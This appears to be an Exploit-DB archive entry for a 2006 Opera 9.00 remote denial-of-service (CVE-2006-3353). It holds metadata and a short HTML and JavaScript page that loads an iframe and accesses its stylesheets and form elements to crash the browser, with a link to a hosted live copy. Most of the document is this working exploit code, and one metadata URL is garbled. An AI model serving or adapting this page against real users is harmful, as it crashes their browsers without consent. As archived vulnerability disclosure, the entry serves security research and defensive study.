Opera Web Browser 9.00 - 'iframe' Remote Denial of Service

Author: y3dips
type: dos
platform: multiple
port: 
date_added: 2006-06-30  
date_updated: 2016-08-24  
verified: 1  
codes: OSVDB-27511;CVE-2006-3353  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comopera90.exe  

raw file: 1972.txt  
<!-- Opera 9 DOS exploit, discovered by
     Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
     http://y3d1ps.blogspot.com
//-->

<html>
<iframe src="palsu.php" name="fake"  ></iframe>
<script type="text/javascript">
function mystyle() {
    if (fake.document.styleSheets.length == 1 )
	{
      f = document.forms["basicstyle"].elements;
      for (j = 0; j < f.length; j++)
	  	{
       	if (f[j].name == 'fsmain');
      	}
      }

 }
mystyle();
</script>
</html>

<!-- live exploit :
     http://y3dips.echo.or.id/opera9-dos/
//-->

# milw0rm.com [2006-07-01]